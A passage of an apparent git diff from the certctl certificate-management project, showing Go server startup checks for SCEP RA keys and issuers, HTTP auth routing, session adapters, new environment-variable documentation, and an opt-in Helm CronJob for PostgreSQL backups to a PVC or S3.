"(RFC 8894 §3.2.2 requires an RA pair so clients can encrypt the " +
|
||||||
|
"CSR to the RA cert and the server can sign the CertRep response)")
|
||||||
|
}
|
||||||
|
|
||||||
|
// File mode check FIRST so a world-readable key never gets read into the
|
||||||
|
// process address space. Ignored on Windows (Stat().Mode() doesn't carry
|
||||||
|
// POSIX bits there); the production deploy is Linux per the Dockerfile.
|
||||||
|
keyInfo, err := os.Stat(raKeyPath)
|
||||||
|
if err != nil {
|
||||||
|
return fmt.Errorf("CERTCTL_SCEP_RA_KEY_PATH stat failed: %w (path=%s)", err, raKeyPath)
|
||||||
|
}
|
||||||
|
mode := keyInfo.Mode().Perm()
|
||||||
|
if mode&0o077 != 0 {
|
||||||
|
return fmt.Errorf("CERTCTL_SCEP_RA_KEY_PATH has insecure permissions %#o; "+
|
||||||
|
"RA private key must be mode 0600 (owner read/write only) — "+
|
||||||
|
"chmod 0600 %s and restart", mode, raKeyPath)
|
||||||
|
}
|
||||||
|
|
||||||
|
certPEM, err := os.ReadFile(raCertPath)
|
||||||
|
if err != nil {
|
||||||
|
return fmt.Errorf("CERTCTL_SCEP_RA_CERT_PATH read failed: %w (path=%s)", err, raCertPath)
|
||||||
|
}
|
||||||
|
keyPEM, err := os.ReadFile(raKeyPath)
|
||||||
|
if err != nil {
|
||||||
|
return fmt.Errorf("CERTCTL_SCEP_RA_KEY_PATH read failed: %w (path=%s)", err, raKeyPath)
|
||||||
|
}
|
||||||
|
|
||||||
|
// tls.X509KeyPair validates that the cert + key parse, share an algorithm,
|
||||||
|
// and the cert's PublicKey matches the key's Public() — three of our six
|
||||||
|
// checks in a single stdlib call, so we use it rather than re-implementing.
|
||||||
|
pair, err := tls.X509KeyPair(certPEM, keyPEM)
|
||||||
|
if err != nil {
|
||||||
|
return fmt.Errorf("RA cert/key pair invalid: %w "+
|
||||||
|
"(cert=%s key=%s) — verify the cert and key are matching halves of "+
|
||||||
|
"the same RA pair, both PEM-encoded, with the cert containing exactly "+
|
||||||
|
"one CERTIFICATE block and the key containing one PRIVATE KEY block",
|
||||||
|
err, raCertPath, raKeyPath)
|
||||||
|
}
|
||||||
|
if len(pair.Certificate) == 0 {
|
||||||
|
// Defensive — tls.X509KeyPair already errors on this, but the contract
|
||||||
|
// for the next x509.ParseCertificate call needs the slice non-empty.
|
||||||
|
return fmt.Errorf("RA cert PEM at %s contains no certificate blocks", raCertPath)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Re-parse the leaf so we can read NotAfter + the public-key alg.
|
||||||
|
leaf, err := x509.ParseCertificate(pair.Certificate[0])
|
||||||
|
if err != nil {
|
||||||
|
return fmt.Errorf("RA cert at %s does not parse as x509: %w", raCertPath, err)
|
||||||
|
}
|
||||||
|
if time.Now().After(leaf.NotAfter) {
|
||||||
|
return fmt.Errorf("RA cert at %s expired at %s — "+
|
||||||
|
"generate a fresh RA pair (the SCEP CertRep signature would be "+
|
||||||
|
"rejected by every conformant client)", raCertPath, leaf.NotAfter.Format(time.RFC3339))
|
||||||
|
}
|
||||||
|
|
||||||
|
// CMS-compatible public-key algorithm gate. RFC 8894 §3.5.2 advertises RSA
|
||||||
|
// and AES; the responder cert algorithm pertains to the signature scheme
|
||||||
|
// used on the CertRep, which means the cert's PublicKey must be RSA or
|
||||||
|
// ECDSA. Catches pre-shared Ed25519 dev keys that micromdm/scep clients
|
||||||
|
// reject.
|
||||||
|
switch leaf.PublicKeyAlgorithm {
|
||||||
|
case x509.RSA, x509.ECDSA:
|
||||||
|
// ok — supported by golang.org/x/crypto/ocsp + every SCEP client
|
||||||
|
default:
|
||||||
|
return fmt.Errorf("RA cert at %s uses unsupported public-key algorithm %s — "+
|
||||||
|
"RFC 8894 §3.5.2 CMS signing requires RSA or ECDSA",
|
||||||
|
raCertPath, leaf.PublicKeyAlgorithm)
|
||||||
|
}
|
||||||
|
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// preflightEnrollmentIssuer validates at startup that an EST/SCEP-bound issuer
|
||||||
|
// can actually serve a CA certificate. This closes audit finding L-005:
|
||||||
|
// pre-Bundle-4 the EST/SCEP startup path verified the issuer existed in the
|
||||||
|
// registry but did not verify the issuer TYPE could emit a CA cert. An
|
||||||
|
// operator who bound CERTCTL_EST_ISSUER_ID to an ACME issuer (which does
|
||||||
|
// not have a static CA cert — see internal/connector/issuer/acme/acme.go::
|
||||||
|
// GetCACertPEM returning an explicit error) would boot successfully and
|
||||||
|
// only see failures at the first /est/cacerts request, hiding the misconfig
|
||||||
|
// for hours/days behind a degraded enrollment surface.
|
||||||
|
//
|
||||||
|
// Strategy: call issuerConn.GetCACertPEM(ctx) at startup with a short
|
||||||
|
// timeout. If the issuer can serve a CA cert (local, vault, openssl,
|
||||||
|
// stepca, awsacmpca, etc.), the call succeeds and we proceed. If not
|
||||||
|
// (acme, digicert, sectigo, entrust, googlecas, ejbca, globalsign — most
|
||||||
|
// vendor-CA issuers that hand back chains per-issuance), the call fails
|
||||||
|
// loudly with the connector's own error string, and the caller os.Exit(1)s.
|
||||||
|
//
|
||||||
|
// Returns nil on success, non-nil error suitable for structured logging
|
||||||
|
// + os.Exit(1) by the caller. Caller is responsible for the timeout context.
|
||||||
|
func preflightEnrollmentIssuer(ctx context.Context, protocol, issuerID string, issuerConn service.IssuerConnector) error {
|
||||||
|
if issuerConn == nil {
|
||||||
|
return fmt.Errorf("%s issuer %q: connector is nil", protocol, issuerID)
|
||||||
|
}
|
||||||
|
caCertPEM, err := issuerConn.GetCACertPEM(ctx)
|
||||||
|
if err != nil {
|
||||||
|
return fmt.Errorf("%s issuer %q: cannot serve CA certificate (%w); "+
|
||||||
|
"choose an issuer type that exposes a static CA chain "+
|
||||||
|
"(local / vault / openssl / stepca / awsacmpca) or disable %s",
|
||||||
|
protocol, issuerID, err, protocol)
|
||||||
|
}
|
||||||
|
if caCertPEM == "" {
|
||||||
|
return fmt.Errorf("%s issuer %q: GetCACertPEM returned empty PEM with no error; "+
|
||||||
|
"choose an issuer type that exposes a static CA chain", protocol, issuerID)
|
||||||
|
}
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// buildFinalHandler builds the outer HTTP dispatch handler that routes incoming
|
||||||
|
// requests to either the authenticated apiHandler chain or the unauthenticated
|
||||||
|
// noAuthHandler chain based on URL path prefix. Extracted from main() so the
|
||||||
|
// dispatch logic can be unit tested without booting the full server stack
|
||||||
|
// (see cmd/server/finalhandler_test.go).
|
||||||
|
//
|
||||||
|
// Dispatch rules (M-001, audit 2026-04-19, option D):
|
||||||
|
//
|
||||||
|
// - /health, /ready, /api/v1/auth/info → no-auth (probes + login detection)
|
||||||
|
// - /api/v1/version → no-auth (U-3 ride-along: build identity for rollout/probes)
|
||||||
|
// - /.well-known/pki/* → no-auth (RFC 5280 CRL, RFC 6960 OCSP)
|
||||||
|
// - /.well-known/est/* → no-auth (RFC 7030 §3.2.3)
|
||||||
|
// - /scep, /scep/* → no-auth (RFC 8894 §3.2, CSR challengePassword)
|
||||||
|
// - /api/v1/* → auth (Bearer token required)
|
||||||
|
// - /assets/* → static file server (dashboard only)
|
||||||
|
// - anything else → SPA index.html fallback (dashboard only)
|
||||||
|
// OR apiHandler (no dashboard)
|
||||||
|
//
|
||||||
|
// EST/SCEP clients (IoT devices, 802.1X supplicants, MDM endpoints, network
|
||||||
|
// appliances) cannot present certctl Bearer tokens, so those endpoints must be
|
||||||
|
// reachable without the Auth middleware. Authentication is instead enforced by
|
||||||
|
// CSR signature verification, profile policy gates, and for SCEP the
|
||||||
|
// challengePassword shared secret (fail-loud gated by preflightSCEPChallengePassword
|
||||||
|
// above).
|
||||||
|
//
|
||||||
|
// webDir must point to a directory containing index.html + assets/ when
|
||||||
|
// dashboardEnabled is true; it is ignored otherwise.
|
||||||
|
func buildFinalHandler(apiHandler, noAuthHandler http.Handler, webDir string, dashboardEnabled bool) http.Handler {
|
||||||
|
var fileServer http.Handler
|
||||||
|
if dashboardEnabled {
|
||||||
|
fileServer = http.FileServer(http.Dir(webDir))
|
||||||
|
}
|
||||||
|
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||||
|
path := r.URL.Path
|
||||||
|
|
||||||
|
// Health/ready, auth/info, and version bypass auth middleware.
|
||||||
|
// Health/ready: Docker/K8s health probes don't carry Bearer tokens.
|
||||||
|
// auth/info: React app calls this before login to detect auth mode.
|
||||||
|
// version: U-3 ride-along (cat-u-no_version_endpoint) — rollout
|
||||||
|
// systems and blackbox probes need build identity without a key.
|
||||||
|
if path == "/health" || path == "/ready" || path == "/api/v1/auth/info" || path == "/api/v1/version" {
|
||||||
|
noAuthHandler.ServeHTTP(w, r)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
// RFC 5280 CRL and RFC 6960 OCSP live under /.well-known/pki/ and MUST
|
||||||
|
// be served unauthenticated — relying parties (browsers, OpenSSL, OCSP
|
||||||
|
// stapling sidecars, mTLS clients) cannot present certctl Bearer tokens.
|
||||||
|
if strings.HasPrefix(path, "/.well-known/pki") {
|
||||||
|
noAuthHandler.ServeHTTP(w, r)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
// RFC 7030 EST endpoints ride the no-auth middleware chain (M-001,
|
||||||
|
// option D, audit 2026-04-19). Trust boundary is CSR signature +
|
||||||
|
// (per EST hardening Phase 2) optional client cert at the handler
|
||||||
|
// layer, not HTTP Bearer. /.well-known/est/cacerts is explicitly
|
||||||
|
// anonymous per RFC 7030 §4.1.1; /.well-known/est-mtls/<PathID>/
|
||||||
|
// (EST hardening Phase 2 sibling route) requires a client cert
|
||||||
|
// gate at the handler layer — both share this prefix gate because
|
||||||
|
// "/.well-known/est-mtls" is itself prefixed by "/.well-known/est".
|
||||||
|
// EST hardening Phase 3's HTTP Basic enrollment-password is a
|
||||||
|
// per-profile handler-layer auth that runs INSIDE the no-auth
|
||||||
|
// middleware chain (since the chain skips the Bearer middleware,
|
||||||
|
// the handler gets to define its own auth contract).
|
||||||
|
if strings.HasPrefix(path, "/.well-known/est") {
|
||||||
|
noAuthHandler.ServeHTTP(w, r)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
// RFC 8894 SCEP rides the no-auth chain (M-001, option D). SCEP clients
|
||||||
|
// authenticate via the challengePassword attribute in the PKCS#10 CSR,
|
||||||
|
// not via HTTP Bearer tokens. preflightSCEPChallengePassword refuses to
|
||||||
|
// start the server if SCEP is enabled without a non-empty shared secret.
|
||||||
|
//
|
||||||
|
// SCEP RFC 8894 + Intune master bundle Phase 6.5: the sibling
|
||||||
|
// /scep-mtls[/<pathID>] route also rides the no-auth chain. Its
|
||||||
|
// auth boundary is (a) client cert verified at the TLS layer +
|
||||||
|
// re-verified per-profile at the handler layer, plus (b) the
|
||||||
|
// challenge password — neither is a Bearer token. The /scepxyz
|
||||||
|
// vs /scep-mtls disambiguation: 'xyz' starts with a letter so the
|
||||||
|
// HasPrefix(path, "/scep/") gate doesn't match it; 'mtls' is its
|
||||||
|
// own dedicated prefix gated below to avoid the same overlap.
|
||||||
|
if path == "/scep" || strings.HasPrefix(path, "/scep/") {
|
||||||
|
noAuthHandler.ServeHTTP(w, r)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if path == "/scep-mtls" || strings.HasPrefix(path, "/scep-mtls/") {
|
||||||
|
noAuthHandler.ServeHTTP(w, r)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
// Authenticated API routes — full middleware stack including Auth.
|
||||||
|
if strings.HasPrefix(path, "/api/v1/") {
|
||||||
|
apiHandler.ServeHTTP(w, r)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
if !dashboardEnabled {
|
||||||
|
// No dashboard: everything non-special falls through to the
|
||||||
|
// authenticated handler (preserves pre-M-001 behavior for API-only
|
||||||
|
// deployments).
|
||||||
|
apiHandler.ServeHTTP(w, r)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
// Dashboard-present: serve static assets directly, SPA fallback for
|
||||||
|
// everything else.
|
||||||
|
if strings.HasPrefix(path, "/assets/") {
|
||||||
|
fileServer.ServeHTTP(w, r)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
http.ServeFile(w, r, webDir+"/index.html")
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// authPermissionCheckerAdapter bridges the typed-string Authorizer
|
||||||
|
// signature (authsvc.Authorizer.CheckPermission takes
|
||||||
|
// authdomain.ActorTypeValue + authdomain.ScopeType) to the plain-string
|
||||||
|
// auth.PermissionChecker interface used by the auth.RequirePermission
|
||||||
|
// middleware factory. Lives in cmd/server so internal/auth doesn't have
|
||||||
|
// to import internal/service/auth + internal/domain/auth (would create
|
||||||
|
// a cycle).
|
||||||
|
type authPermissionCheckerAdapter struct {
|
||||||
|
a *authsvc.Authorizer
|
||||||
|
}
|
||||||
|
|
||||||
|
func (ad authPermissionCheckerAdapter) CheckPermission(
|
||||||
|
ctx context.Context,
|
||||||
|
actorID string,
|
||||||
|
actorType string,
|
||||||
|
tenantID string,
|
||||||
|
permission string,
|
||||||
|
scopeType string,
|
||||||
|
scopeID *string,
|
||||||
|
) (bool, error) {
|
||||||
|
return ad.a.CheckPermission(
|
||||||
|
ctx,
|
||||||
|
actorID,
|
||||||
|
authdomainAlias.ActorTypeValue(actorType),
|
||||||
|
tenantID,
|
||||||
|
permission,
|
||||||
|
authdomainAlias.ScopeType(scopeType),
|
||||||
|
scopeID,
|
||||||
|
)
|
||||||
|
}
|
||||||
|
|
||||||
|
// authCheckResolverAdapter bridges the postgres ActorRoleRepository
|
||||||
|
// (authdomain.ActorTypeValue) to handler.AuthCheckResolver
|
||||||
|
// (domain.ActorType). Lives in cmd/server so the handler layer keeps its
|
||||||
|
// existing import set; the GUI's /v1/auth/check probe round-trips
|
||||||
|
// through this on every page load. Read-only — no caller / no audit row.
|
||||||
|
//
|
||||||
|
// Bundle 1 Phase 3 closure (M1): the equivalent surface area on
|
||||||
|
// /v1/auth/me runs through the service layer's auth.role.list permission
|
||||||
|
// gate, which the GUI may not yet hold during initial render. AuthCheck
|
||||||
|
// has no permission gate (its only requirement is "the request
|
||||||
|
// authenticated"), so the bypass is by design.
|
||||||
|
type authCheckResolverAdapter struct {
|
||||||
|
repo *postgres.ActorRoleRepository
|
||||||
|
}
|
||||||
|
|
||||||
|
func (ad authCheckResolverAdapter) ListRoles(
|
||||||
|
ctx context.Context,
|
||||||
|
actorID string,
|
||||||
|
actorType domain.ActorType,
|
||||||
|
tenantID string,
|
||||||
|
) ([]*authdomainAlias.ActorRole, error) {
|
||||||
|
return ad.repo.ListByActor(ctx, actorID, authdomainAlias.ActorTypeValue(actorType), tenantID)
|
||||||
|
}
|
||||||
|
|
||||||
|
func (ad authCheckResolverAdapter) EffectivePermissions(
|
||||||
|
ctx context.Context,
|
||||||
|
actorID string,
|
||||||
|
actorType domain.ActorType,
|
||||||
|
tenantID string,
|
||||||
|
) ([]repository.EffectivePermission, error) {
|
||||||
|
return ad.repo.EffectivePermissions(ctx, actorID, authdomainAlias.ActorTypeValue(actorType), tenantID)
|
||||||
|
}
|
||||||
|
|
||||||
|
// =============================================================================
|
||||||
|
// sessionMinterAdapter — bridge from *session.Service to oidcsvc.SessionMinter.
|
||||||
|
//
|
||||||
|
// The OIDC service's SessionMinter port (Phase 3) takes a *userdomain.User
|
||||||
|
// + role IDs and returns (cookie, csrf, err). The session.Service's
|
||||||
|
// Create method takes (actorID, actorType, ip, ua) -> *CreateResult.
|
||||||
|
// This adapter unwraps the User into actorID/actorType + reshapes the
|
||||||
|
// return tuple. Lives in cmd/server so the session package doesn't have
|
||||||
|
// to know about user.User and the user package doesn't have to know
|
||||||
|
// about session.CreateResult.
|
||||||
|
// =============================================================================
|
||||||
|
|
||||||
|
type sessionMinterAdapter struct {
|
||||||
|
svc *session.Service
|
||||||
|
}
|
||||||
|
|
||||||
|
func (a *sessionMinterAdapter) MintForUser(
|
||||||
|
ctx context.Context,
|
||||||
|
user *userdomain.User,
|
||||||
|
_ []string, // roleIDs unused at the session-mint layer; the rbac middleware looks them up at request time
|
||||||
|
ip, userAgent string,
|
||||||
|
) (cookieValue, csrfToken string, err error) {
|
||||||
|
if user == nil {
|
||||||
|
return "", "", fmt.Errorf("session mint: user is nil")
|
||||||
|
}
|
||||||
|
res, err := a.svc.Create(ctx, user.ID, string(domain.ActorTypeUser), ip, userAgent)
|
||||||
|
if err != nil {
|
||||||
|
return "", "", err
|
||||||
|
}
|
||||||
|
return res.CookieValue, res.CSRFToken, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// silenceUnusedImports keeps the new oidcsvc + oidcdomain imports load-
|
||||||
|
// bearing in case any file shuffles. Linker dead-code elimination handles
|
||||||
|
// the runtime cost.
|
||||||
|
var (
|
||||||
|
_ = oidcdomain.OIDCProvider{}
|
||||||
|
)
|
||||||
|
|
||||||
|
// =============================================================================
|
||||||
|
// breakglassSessionMinterAdapter — bridge from *session.Service to
|
||||||
|
// breakglass.SessionMinter.
|
||||||
|
//
|
||||||
|
// The break-glass service's SessionMinter port (Phase 7.5) returns
|
||||||
|
// (cookie, csrf, err); the underlying *session.Service.Create returns
|
||||||
|
// *CreateResult. This adapter unwraps the result. Lives in cmd/server
|
||||||
|
// so the breakglass package doesn't have to know about session.Service.
|
||||||
|
// =============================================================================
|
||||||
|
|
||||||
|
type breakglassSessionMinterAdapter struct {
|
||||||
|
svc *session.Service
|
||||||
|
}
|
||||||
|
|
||||||
|
func (a breakglassSessionMinterAdapter) Create(ctx context.Context, actorID, actorType, ip, userAgent string) (string, string, error) {
|
||||||
|
res, err := a.svc.Create(ctx, actorID, actorType, ip, userAgent)
|
||||||
|
if err != nil {
|
||||||
|
return "", "", err
|
||||||
|
}
|
||||||
|
return res.CookieValue, res.CSRFToken, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// RevokeAllForActor — Audit 2026-05-10 HIGH-1 wire. After a break-glass
|
||||||
|
// password rotation or credential removal, every active session for the
|
||||||
|
// target actor must be revoked so a phished-then-rotated credential
|
||||||
|
// doesn't leave the attacker's session live.
|
||||||
|
func (a breakglassSessionMinterAdapter) RevokeAllForActor(ctx context.Context, actorID, actorType string) error {
|
||||||
|
return a.svc.RevokeAllForActor(ctx, actorID, actorType)
|
||||||
|
}
|
||||||
|
|
||||||
|
// oidcProvidersListAdapter bridges the postgres OIDCProviderRepository
|
||||||
|
// to handler.OIDCProvidersListResolver. The handler returns
|
||||||
|
// []*OIDCProviderInfo (id + display_name + login_url) for the public-
|
||||||
|
// safe GUI Login-page payload; the repo returns the full OIDCProvider
|
||||||
|
// row. The adapter projects + maps the login_url shape that
|
||||||
|
// /auth/oidc/login?provider=<id> expects. Auth Bundle 2 Phase 6 /
|
||||||
|
// Category E.
|
||||||
|
type oidcProvidersListAdapter struct {
|
||||||
|
repo repository.OIDCProviderRepository
|
||||||
|
}
|
||||||
|
|
||||||
|
func (a oidcProvidersListAdapter) List(ctx context.Context, tenantID string) ([]*handler.OIDCProviderInfo, error) {
|
||||||
|
provs, err := a.repo.List(ctx, tenantID)
|
||||||
|
if err != nil {
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
out := make([]*handler.OIDCProviderInfo, 0, len(provs))
|
||||||
|
for _, p := range provs {
|
||||||
|
// Audit 2026-05-10 MED-9 closure — filter disabled providers
|
||||||
|
// at the adapter so the LoginPage's "Sign in with X" buttons
|
||||||
|
// don't render for offline IdPs. The HandleAuthRequest
|
||||||
|
// service-layer ErrProviderDisabled check is the
|
||||||
|
// defense-in-depth guard for direct API / MCP / CLI callers.
|
||||||
|
if !p.Enabled {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
out = append(out, &handler.OIDCProviderInfo{
|
||||||
|
ID: p.ID,
|
||||||
|
DisplayName: p.Name,
|
||||||
|
LoginURL: "/auth/oidc/login?provider=" + p.ID,
|
||||||
|
})
|
||||||
|
}
|
||||||
|
return out, nil
|
||||||
|
}
|
||||||
@@ -422,6 +422,8 @@ Every `CERTCTL_*` environment variable is read by the server's `internal/config/
|
|||||||
| `CERTCTL_DEMO_MODE_ACK` | `false` | Acknowledges demo-mode synthetic admin posture (required when `CERTCTL_AUTH_TYPE=none` binds to a non-loopback host). Must be paired with `CERTCTL_DEMO_MODE_ACK_TS` per Phase 2 SEC-H3. |
|
| `CERTCTL_DEMO_MODE_ACK` | `false` | Acknowledges demo-mode synthetic admin posture (required when `CERTCTL_AUTH_TYPE=none` binds to a non-loopback host). Must be paired with `CERTCTL_DEMO_MODE_ACK_TS` per Phase 2 SEC-H3. |
|
||||||
| `CERTCTL_DEMO_MODE_ACK_TS` | (empty) | Phase 2 SEC-H3: unix-epoch timestamp at which DemoModeAck was last acknowledged. When `CERTCTL_DEMO_MODE_ACK=true`, this must parse as a unix epoch within the last 24h. Set via `CERTCTL_DEMO_MODE_ACK_TS=$(date +%s)` at every `docker compose up`. |
|
| `CERTCTL_DEMO_MODE_ACK_TS` | (empty) | Phase 2 SEC-H3: unix-epoch timestamp at which DemoModeAck was last acknowledged. When `CERTCTL_DEMO_MODE_ACK=true`, this must parse as a unix epoch within the last 24h. Set via `CERTCTL_DEMO_MODE_ACK_TS=$(date +%s)` at every `docker compose up`. |
|
||||||
| `CERTCTL_ACME_INSECURE_ACK` | `false` | Phase 2 SEC-M4: explicit ACK required to boot with `CERTCTL_ACME_INSECURE=true`. Production deploys MUST never set either flag. |
|
| `CERTCTL_ACME_INSECURE_ACK` | `false` | Phase 2 SEC-M4: explicit ACK required to boot with `CERTCTL_ACME_INSECURE=true`. Production deploys MUST never set either flag. |
|
||||||
|
| `CERTCTL_DATABASE_MAX_CONNS` | `50` | Phase 6 SCALE-M1: max open DB connections in the server's pool. Default was `25` pre-Phase-6. Idle connections = max/5. Operator-tune ladder for larger fleets: ≤500 certs → 50; 5K certs → 100; 50K certs → 200 (also raise Postgres `max_connections`). See `docs/operator/scale.md`. |
|
||||||
|
| `CERTCTL_ASYNC_POLL_MAX_WAIT_SECONDS` | (unset → 600) | Phase 6 SCALE-M3: process-wide override for the asyncpoll package's `DefaultMaxWait` (10 minutes). Caps total wall-clock time the certctl-server spends polling an async CA (DigiCert / Entrust / GlobalSign / Sectigo) before returning `StillPending` to the scheduler for re-enqueue. Per-connector overrides (`CERTCTL_DIGICERT_POLL_MAX_WAIT_SECONDS`, etc.) take precedence when set. |
|
||||||
|
|
||||||
### Agent
|
### Agent
|
||||||
|
|
||||||
|
|||||||
@@ -0,0 +1,178 @@
|
|||||||
|
{{- /*
|
||||||
|
Phase 4 DEPL-H2 closure (2026-05-14): opt-in Helm CronJob for
|
||||||
|
PostgreSQL backups.
|
||||||
|
|
||||||
|
OPERATOR OPT-IN. Default `backup.enabled: false`. Turning it on
|
||||||
|
requires:
|
||||||
|
- In-cluster Postgres (this CronJob does NOT cover managed DB
|
||||||
|
services — for AWS RDS / GCP CloudSQL / Azure DB rely on the
|
||||||
|
provider's PITR).
|
||||||
|
- A sink choice (PVC or S3) configured in values.yaml.
|
||||||
|
- For S3: a Secret holding AWS_ACCESS_KEY_ID + AWS_SECRET_ACCESS_KEY
|
||||||
|
(or use a service account with IRSA on EKS).
|
||||||
|
|
||||||
|
The pg_dump invocation matches the canonical shape documented in
|
||||||
|
docs/operator/runbooks/postgres-backup.md so a manual run and a
|
||||||
|
CronJob run produce byte-identical dumps:
|
||||||
|
|
||||||
|
pg_dump --format=custom --no-owner --no-acl --dbname=certctl
|
||||||
|
|
||||||
|
For sink choices beyond PVC + S3 (GCS, Azure Blob, NFS, restic, etc.),
|
||||||
|
extend the `aws s3 cp` line below. The Job is intentionally minimal —
|
||||||
|
it does ONE thing (capture + ship), not orchestrate retention or
|
||||||
|
rotation. Off-host retention is the sink's responsibility (S3 lifecycle
|
||||||
|
rules, PVC snapshot retention on the storage class, etc.).
|
||||||
|
*/ -}}
|
||||||
|
{{- if .Values.backup.enabled }}
|
||||||
|
apiVersion: batch/v1
|
||||||
|
kind: CronJob
|
||||||
|
metadata:
|
||||||
|
name: {{ include "certctl.fullname" . }}-postgres-backup
|
||||||
|
labels:
|
||||||
|
{{- include "certctl.labels" . | nindent 4 }}
|
||||||
|
app.kubernetes.io/component: postgres-backup
|
||||||
|
spec:
|
||||||
|
schedule: {{ .Values.backup.schedule | quote }}
|
||||||
|
concurrencyPolicy: Forbid
|
||||||
|
successfulJobsHistoryLimit: {{ .Values.backup.successfulJobsHistoryLimit | default 3 }}
|
||||||
|
failedJobsHistoryLimit: {{ .Values.backup.failedJobsHistoryLimit | default 1 }}
|
||||||
|
startingDeadlineSeconds: {{ .Values.backup.startingDeadlineSeconds | default 300 }}
|
||||||
|
jobTemplate:
|
||||||
|
spec:
|
||||||
|
backoffLimit: {{ .Values.backup.backoffLimit | default 1 }}
|
||||||
|
activeDeadlineSeconds: {{ .Values.backup.activeDeadlineSeconds | default 3600 }}
|
||||||
|
template:
|
||||||
|
metadata:
|
||||||
|
labels:
|
||||||
|
{{- include "certctl.labels" . | nindent 12 }}
|
||||||
|
app.kubernetes.io/component: postgres-backup
|
||||||
|
spec:
|
||||||
|
restartPolicy: Never
|
||||||
|
{{- with .Values.imagePullSecrets }}
|
||||||
|
imagePullSecrets:
|
||||||
|
{{- toYaml . | nindent 12 }}
|
||||||
|
{{- end }}
|
||||||
|
serviceAccountName: {{ include "certctl.serviceAccountName" . }}
|
||||||
|
securityContext:
|
||||||
|
runAsUser: 1000
|
||||||
|
runAsGroup: 1000
|
||||||
|
runAsNonRoot: true
|
||||||
|
fsGroup: 1000
|
||||||
|
containers:
|
||||||
|
- name: backup
|
||||||
|
image: {{ .Values.backup.image | default "postgres:16-alpine" | quote }}
|
||||||
|
imagePullPolicy: {{ .Values.backup.imagePullPolicy | default "IfNotPresent" | quote }}
|
||||||
|
env:
|
||||||
|
- name: PGHOST
|
||||||
|
value: {{ include "certctl.fullname" . }}-postgres
|
||||||
|
- name: PGPORT
|
||||||
|
value: {{ .Values.postgresql.service.port | default 5432 | quote }}
|
||||||
|
- name: PGUSER
|
||||||
|
valueFrom:
|
||||||
|
secretKeyRef:
|
||||||
|
name: {{ include "certctl.fullname" . }}-postgres
|
||||||
|
key: username
|
||||||
|
- name: PGPASSWORD
|
||||||
|
valueFrom:
|
||||||
|
secretKeyRef:
|
||||||
|
name: {{ include "certctl.fullname" . }}-postgres
|
||||||
|
key: password
|
||||||
|
- name: PGDATABASE
|
||||||
|
valueFrom:
|
||||||
|
secretKeyRef:
|
||||||
|
name: {{ include "certctl.fullname" . }}-postgres
|
||||||
|
key: database
|
||||||
|
{{- if eq (.Values.backup.sink | default "pvc") "s3" }}
|
||||||
|
# S3 sink — operator provides AWS credentials via the
|
||||||
|
# Secret referenced in backup.s3.credentialsSecret. The
|
||||||
|
# credentials need s3:PutObject + s3:ListBucket on the
|
||||||
|
# target bucket only; least-privilege per industry
|
||||||
|
# standard.
|
||||||
|
- name: AWS_ACCESS_KEY_ID
|
||||||
|
valueFrom:
|
||||||
|
secretKeyRef:
|
||||||
|
name: {{ .Values.backup.s3.credentialsSecret.name | quote }}
|
||||||
|
key: {{ .Values.backup.s3.credentialsSecret.accessKeyIdKey | default "AWS_ACCESS_KEY_ID" }}
|
||||||
|
- name: AWS_SECRET_ACCESS_KEY
|
||||||
|
valueFrom:
|
||||||
|
secretKeyRef:
|
||||||
|
name: {{ .Values.backup.s3.credentialsSecret.name | quote }}
|
||||||
|
key: {{ .Values.backup.s3.credentialsSecret.secretAccessKeyKey | default "AWS_SECRET_ACCESS_KEY" }}
|
||||||
|
{{- with .Values.backup.s3.region }}
|
||||||
|
- name: AWS_DEFAULT_REGION
|
||||||
|
value: {{ . | quote }}
|
||||||
|
{{- end }}
|
||||||
|
{{- end }}
|
||||||
|
command:
|
||||||
|
- /bin/sh
|
||||||
|
- -ceu
|
||||||
|
- |
|
||||||
|
# Phase 4 DEPL-H2: canonical pg_dump shape per
|
||||||
|
# docs/operator/runbooks/postgres-backup.md.
|
||||||
|
# Custom-format compressed dump, no ownership /
|
||||||
|
# ACL embedded — produces a portable artifact
|
||||||
|
# restorable into any Postgres ≥ source major
|
||||||
|
# via `pg_restore -d certctl <dump>`.
|
||||||
|
set -euo pipefail
|
||||||
|
TIMESTAMP="$(date -u +%Y%m%dT%H%M%SZ)"
|
||||||
|
DUMP_FILE="/tmp/certctl-${TIMESTAMP}.dump"
|
||||||
|
|
||||||
|
echo "[backup-cronjob] capturing dump at ${TIMESTAMP}"
|
||||||
|
pg_dump --format=custom --no-owner --no-acl --dbname="${PGDATABASE}" \
|
||||||
|
> "${DUMP_FILE}"
|
||||||
|
|
||||||
|
# Integrity check — pg_restore --list parses the
|
||||||
|
# dump's table-of-contents; a corrupt dump fails
|
||||||
|
# here without shipping garbage off-host. Same
|
||||||
|
# check the manual runbook performs.
|
||||||
|
echo "[backup-cronjob] verifying dump integrity"
|
||||||
|
pg_restore --list "${DUMP_FILE}" > /dev/null
|
||||||
|
|
||||||
|
{{- if eq (.Values.backup.sink | default "pvc") "s3" }}
|
||||||
|
# S3 sink — requires aws-cli. The default
|
||||||
|
# postgres:16-alpine image does NOT include
|
||||||
|
# aws-cli; operators MUST set
|
||||||
|
# backup.image to an image that bundles both
|
||||||
|
# (e.g. ghcr.io/your-org/postgres-aws:16) OR
|
||||||
|
# override backup.command to install aws-cli at
|
||||||
|
# runtime. The line below assumes the image has
|
||||||
|
# `aws` on PATH.
|
||||||
|
S3_PATH="{{ .Values.backup.s3.bucket }}/{{ .Values.backup.s3.prefix | default "certctl" }}/certctl-${TIMESTAMP}.dump"
|
||||||
|
